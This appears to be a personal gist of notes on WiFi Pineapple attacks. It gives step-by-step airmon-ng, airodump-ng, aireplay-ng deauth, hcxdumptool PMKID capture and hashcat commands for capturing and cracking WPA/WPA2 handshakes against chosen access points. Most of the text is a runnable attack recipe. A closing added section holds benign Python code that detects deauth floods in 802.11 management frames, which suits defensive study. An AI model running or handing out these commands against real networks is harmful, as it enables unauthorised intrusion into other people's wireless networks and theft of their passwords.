Created
December 10, 2019 09:37
WiFi Pineapple Attacks
airmon-ng check kill
https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/
On nano, or other wifi access point monitoring:
airmon-ng start wlan1
airodump-ng -w PacketCapture wlan1mon
(Then just go near the AP you're wanting to crack and wait for someone to connect to it.)
(You could speed this up with a deauth attack as mentioned above.)
Once someone has connected to the network, you might want to make sure it was picked up by the nano in case you were too far away or something.
To do this, stop the airodump (Control + C). Then run aircrack-ng PacketCapture-01.cap (It will give you a list of networks. If it says you have handshakes beside it, you're good to go. If not, try again.)
You'll need to convert your PacketCapture to a different format using the command
!!!SKIP THIS, USE TOOLS BELOW!!!
aircrack-ng -J Capture.hccap PacketCapture-01.cap
Now go home, take the Capture.hccap file off of your pineapple and store it somewhere on your computer.
You'll need to get a large password dictionary.
Now that you have all the information recorded in the Capture file, you'll need to crack it.
!!!THIS HERE!!!!
Ok, get ready for hashcat:
root@kaliboxen:~/tools/hashcat-utils/src# ./cap2hccapx.bin PacketCapture-01.cap output.hccapx
drews-mbp:hashcat drewk$ ./hashcat -m 2500 output.hccapx ~/VM\ Share/PasswordLists/rockyou.txt
************
https://forums.hak5.org/topic/44213-pmkid-attack-on-wifi-pineapples/
https://miloserdov.org/?p=2100
https://www.bitcrack.net/the-pmkid-attack/
Probably works best off the Alfa radio
PMKID:
Can run this against a wlanXmon device
hcxdumptool -o test.pcapng -i wlan2 --enable_status 3
To go completely passive on the hcxdump, add these flags:
--disable_ap_attacks --disable_deauthentications --disable_client_attacks --disable_active_scan
To target a specific AP (from the awesome bitcrack article above):
We now run HCXDumpTool again, using the filter switches and watch as it attacks our target network, waiting for a PMKID.
The switches are:
--filterlist= To tell the tool which file contains the MAC addresses
--filtermode=2 Tells the tool that these MAC addresses in --filterlist are our targets, ignore anything else:
hcxpcaptool -z test.16800 test.pcapng
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
*********************
General tricks:
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0
# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
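The deauth burst in that last step is exactly what a wireless IDS watches for on the defender's side. The following is an added example (not part of this gist) that parses raw 802.11 management frames and raises an alert when one BSSID sees a burst of deauth/disassoc frames; the sample frames, the locally administered MAC addresses and the 10-frames-in-5-seconds threshold are constructed for illustration.

```python
# Added example: flag deauth/disassoc bursts in raw 802.11 management frames.
# Frames, MACs and thresholds below are constructed for illustration.
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 12, 10  # 802.11 management frame subtypes

def parse_mgmt_frame(frame: bytes):
    """(subtype, addr1, addr2, addr3/BSSID, reason) or None if not management."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if ftype != 0:  # 0 = management
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    addrs = mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]  # little-endian reason code
    return (subtype, *addrs, reason)

def detect_deauth_flood(frames, window=5.0, threshold=10):
    """frames: iterable of (timestamp_s, raw_bytes). One alert (ts, bssid, count)
    per BSSID whose deauth/disassoc count in a sliding window reaches threshold."""
    recent, alerts, alerted = defaultdict(deque), [], set()
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        q = recent[parsed[3]]  # addr3 carries the BSSID in a deauth frame
        q.append(ts)
        while q and ts - q[0] > window:  # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and parsed[3] not in alerted:
            alerts.append((ts, parsed[3], len(q)))
            alerted.add(parsed[3])
    return alerts

def build_deauth(bssid: bytes, client: bytes, reason: int = 7) -> bytes:
    """Construct a minimal deauth frame (sample input only)."""
    return (bytes([0xC0, 0x00]) + b"\x3a\x01" + client + bssid + bssid
            + b"\x00\x00" + struct.pack("<H", reason))

# Constructed sample: locally administered MACs, one deauth every 0.5 s.
SAMPLE_BSSID, SAMPLE_STA = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
SAMPLE_FRAMES = [(i * 0.5, build_deauth(SAMPLE_BSSID, SAMPLE_STA)) for i in range(12)]
# detect_deauth_flood(SAMPLE_FRAMES) → [(4.5, '02:00:00:00:00:01', 10)]
```

A real deployment would feed frames from a monitor-mode capture (e.g. a pcap of the channel in question) and tune the window and threshold to the normal roaming rate of the site.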